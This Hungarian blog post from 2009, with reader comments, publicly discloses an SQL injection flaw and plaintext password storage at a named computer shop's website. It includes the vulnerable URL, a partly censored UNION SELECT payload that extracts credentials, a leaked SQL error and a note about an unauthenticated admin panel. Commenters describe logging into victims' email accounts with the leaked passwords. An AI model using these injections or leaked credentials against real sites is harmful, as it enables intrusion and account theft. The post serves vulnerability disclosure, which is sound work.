Még múlt héten kaptam sghctomától pár érdekességet a magyar netről. Megpróbáltam felvenni a kapcsolatot az Aliencomputers-szel is, sajnos sikertelenül...
... egy eleg ismert szamitogepbolt, toluk az ember azert minimum azt elvarna, hogy ne plaintext-ben legyenek tarolva a jelszavak...
http://aliencomputers.hu/
index.php?mit=30&t_kat1_id=1& t_kat2_id=0'+union+select+1,+ concat(loginnev,0x2d,email, 0x3a,jelszo), [...censored ;)...]
Frissítés: Az illetékesek közben léptek valamit az ügyben, de buksikutya felhívta a figyelmemet, hogy az admin felületen még mindig gyönyörűen be lehet mászni autentikáció nélkül :P
fotofabrik 2009.10.15. 15:56:35
és ha a userek többi helyen használt jelszava is stimmel ezekkel? :o
buherator · http://buhera.blog.hu 2009.10.15. 16:10:06
Itt kell némi munka hogy végigvidd az injektet... Másrészt aki ugyanazt a jelszót használja minden oldalon, annak ez már nem oszt nem szoroz.
Laca@blog 2009.10.15. 17:13:15
én is küldtem pár hete, nem ennyire vészes hibákról, de politikailag korrekt voltam :) :) :)
előbb utóbb csak kikerül :)
julesthe5th 2009.10.15. 17:13:31
eddig találomra kiszedtem pár bonyolultabb jelszóval próbálkozó muksót, és már két yahoo-s és egy gmailes postafiókba bejutottam. Az egyik helyen még skype emlékeztetőt is leltem, így gyanítom, ha kellene még a skype jelszavát is megtudnám, és isten tudja még micsodát!
Persze nem használok fel semmit, sehol... de azért durva!
b3nsz4 (törölt) 2009.10.15. 17:22:39
ez így van.. hidd el h 75% ugyanazt a jelszót használja mindenhova : )
én már apeh-tól kezdve rendőrségi ügyekről is találtam dolgokat.. : )
Szóval sok sikert ; )
Fearless · http://kozepvonal.blog.hu 2009.10.15. 18:31:25
geciMano 2009.10.15. 21:56:33
EQ · http://rycon.hu 2009.10.16. 02:28:39
HoaxSpecialist · http://hacker.blog.hu 2009.10.16. 06:08:50
SQL/DB Hiba -- [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%' AND statusz='megjelenik' AND uzlet_id='5' ORDER BY nev' at line 1]
[SELECT * FROM termek_data WHERE t_kat1_id='1' AND nev LIKE '%'%' AND statusz='megjelenik' AND uzlet_id='5' ORDER BY nev]
na ez damnit. merre jartok fejlesztok? :)
etkezesiutalvany 2009.10.16. 09:49:15
Szerintem nem kellett volna kirakni!
Ez elrettentő példának picit sok - bár hatásos, de szerintem nem etikus szabad prédának kitenni ennyi ember adatát...
lásd b3nsz4 hozzászólásást. ez parasztság.
R01 2009.10.16. 11:09:33
HoaxSpecialist · http://hacker.blog.hu 2009.10.16. 12:11:58
eax_ 2009.10.16. 13:08:59
Surprise: az osszes ilyen. A jelszavakat igyis-ugyis plaintextben kuldod, hogy abban is taroljak-e, az mar reszletkerdes, ettol meg az adminok vigan hozzaferhetnek.
buherator · http://buhera.blog.hu 2009.10.16. 14:10:45
2) Fejezzétek már abba egymás köpködését, kezd rohadt unalmas lenni...
buherator · http://buhera.blog.hu 2009.10.16. 17:54:11